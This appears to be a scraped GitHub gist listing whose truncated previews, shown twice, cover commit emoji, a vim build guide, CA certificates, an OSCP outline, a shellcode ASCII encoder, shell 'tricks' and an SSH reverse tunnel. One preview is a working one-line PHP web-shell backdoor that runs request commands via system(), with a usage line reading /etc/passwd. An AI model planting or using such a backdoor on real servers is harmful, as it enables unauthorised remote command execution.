Kevin Kirsche kkirsche

## ConventionalCommitsEmoji.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                kkirsche
                / ConventionalCommitsEmoji.md
            
            
              Last active
              June 17, 2021 18:03
                — forked from parmentf/ConventionalCommitsEmoji.md
            
              
                Emoji for Conventional Commits
              
          
Type
Emoji
code


build
📦
:package:


chore
🔧
:wrench:


ci
👷
:construction_worker:


docs
📚
:books:


feat
✨
:sparkles:


fix
🐛
:bug:


perf
🚀
:rocket:


refactor
🔨
:hammer:


## ascii-shellcode-encoder.py
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving

## vim8.x_with_lua
I needed to install vim with lua support because I wanted to use neocomplete in my recently installed 15.04 distro. Also, this has python3 enabled by default.

Tested on 16.04 now

Update: This has been tested and verified to work on Ubuntu 16.04 as well. Also, if you wish to use particular branch/tag, you can get the version and then checkout appropriately.
The following (based upon https://gist.github.com/jdewit/9818870) should work though I copied it from history:

sudo apt-get remove --purge vim vim-runtime vim-gnome vim-tiny vim-common vim-gui-common
sudo apt-get build-dep vim-gnome
sudo apt-get install build-essential liblua5.3-0 liblua5.3-dev python-dev ruby-dev libperl-dev libncurses5-dev libgnome2-dev libgnomeui-dev libgtk2.0-dev libatk1.0-dev libbonoboui2-dev libcairo2-dev libx11-dev libxpm-dev libxt-dev

## dumprequest.php
<?php
// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40

class DumpHTTPRequestToFile {

	public function execute($targetFile) {

		$data = sprintf(
			"%s %s %s\n\nHTTP headers:\n",
			$_SERVER['REQUEST_METHOD'],

## how-to-oscp-final.md

      
              1 file
            
          
              15 forks
            
          
                0 comments
              
            
              35 stars
            
          
                kkirsche
                / how-to-oscp-final.md
            
            
              Created
              December 18, 2017 16:16
                — forked from meldridge/how-to-oscp-final.md
            
          
    How to pass the OSCP


Recon
Find vuln
Exploit
Escalate
Document it

Time yourself


## Simple-Backdoor-One-Liner.php
<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>

## MyPackage.opm
<?xml version="1.0" encoding="utf-8" ?>
<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>

## tricks
#get a pty through python
python -c 'import pty; pty.spawn("/bin/bash");'

#grab the user agent from the http header on port 10443
tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

#base64 decode a string
echo STRINGTODECODE | base64 --decode

#escape jail shell

## go-ssh-reverse-tunnel.go
/*

Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:

   ssh -R 8080:127.0.0.1:8080 operatore@146.148.22.123

which opens a tunnel between the two endpoints and permit to exchange information on this direction:

   server:8080 -----> client:8080

## add CA cert on CentOS.md

      
              1 file
            
          
              0 forks
            
          
                0 comments
              
            
              0 stars
            
          
                kkirsche
                / add CA cert on CentOS.md
            
            
              Created
              August 2, 2017 20:00
                — forked from kekru/add CA cert on CentOS Debian Ubuntu.md
            
              
                Add CA cert to local trust store on CentOS or Debian
              
          
Open a webpage that uses the CA with Firefox
Click the lock-icon in the addressbar -> show information -> show certificate
the certificate viewer will open
click details and choose the certificate of the certificate-chain, you want to import to CentOS
click "Export..." and save it as .crt file
Copy the .crt file to /etc/pki/ca-trust/source/anchors on your CentOS machine
run update-ca-trust extract
test it with wget https://thewebsite.org
Type	Emoji	code
build	📦	`:package:`
chore	🔧	`:wrench:`
ci	👷	`:construction_worker:`
docs	📚	`:books:`
feat	✨	`:sparkles:`
fix	🐛	`:bug:`
perf	🚀	`:rocket:`
refactor	🔨	`:hammer:`
	#!/usr/bin/python
	#
	# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
	# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
	# utility (as described in: Hacking - The Art of Exploitation).
	#
	# Basically one gives to the program's output a binary encoded shellcode,
	# and it yields on the output it's ASCII encoded form.
	#
	# This payload will at the beginning align the stack by firstly moving
	I needed to install vim with lua support because I wanted to use neocomplete in my recently installed 15.04 distro. Also, this has python3 enabled by default.

	Tested on 16.04 now

	Update: This has been tested and verified to work on Ubuntu 16.04 as well. Also, if you wish to use particular branch/tag, you can get the version and then checkout appropriately.
	The following (based upon https://gist.github.com/jdewit/9818870) should work though I copied it from history:

	sudo apt-get remove --purge vim vim-runtime vim-gnome vim-tiny vim-common vim-gui-common
	sudo apt-get build-dep vim-gnome
	sudo apt-get install build-essential liblua5.3-0 liblua5.3-dev python-dev ruby-dev libperl-dev libncurses5-dev libgnome2-dev libgnomeui-dev libgtk2.0-dev libatk1.0-dev libbonoboui2-dev libcairo2-dev libx11-dev libxpm-dev libxt-dev
	<?php
	// https://gist.github.com/magnetikonline/650e30e485c0f91f2f40

	class DumpHTTPRequestToFile {

	public function execute($targetFile) {

	$data = sprintf(
	"%s %s %s\n\nHTTP headers:\n",
	$_SERVER['REQUEST_METHOD'],
	<!-- Simple PHP Backdoor By DK (One-Liner Version) -->
	<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd -->
	<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
	<?xml version="1.0" encoding="utf-8" ?>
	<otrs_package version="1.1">
	<Name>MyModule</Name>
	<Version>1.0.0</Version>
	<Vendor>My Module</Vendor>
	<URL>http://otrs.org/</URL>
	<License>GNU GENERAL PUBLIC LICENSE Version 2, June 1991</License>
	<ChangeLog Version="1.0.1" Date="2006-11-11 11:11:11">My Module.</ChangeLog>
	<Description Lang="en">MyModule</Description>
	<Framework>5.x.x</Framework>
	#get a pty through python
	python -c 'import pty; pty.spawn("/bin/bash");'

	#grab the user agent from the http header on port 10443
	tcpdump -A -l -vvvs 1024 -npi eth0 port 10443

	#base64 decode a string
	echo STRINGTODECODE \| base64 --decode

	#escape jail shell
	/*

	Go-Language implementation of an SSH Reverse Tunnel, the equivalent of below SSH command:

	ssh -R 8080:127.0.0.1:8080 operatore@146.148.22.123

	which opens a tunnel between the two endpoints and permit to exchange information on this direction:

	server:8080 -----> client:8080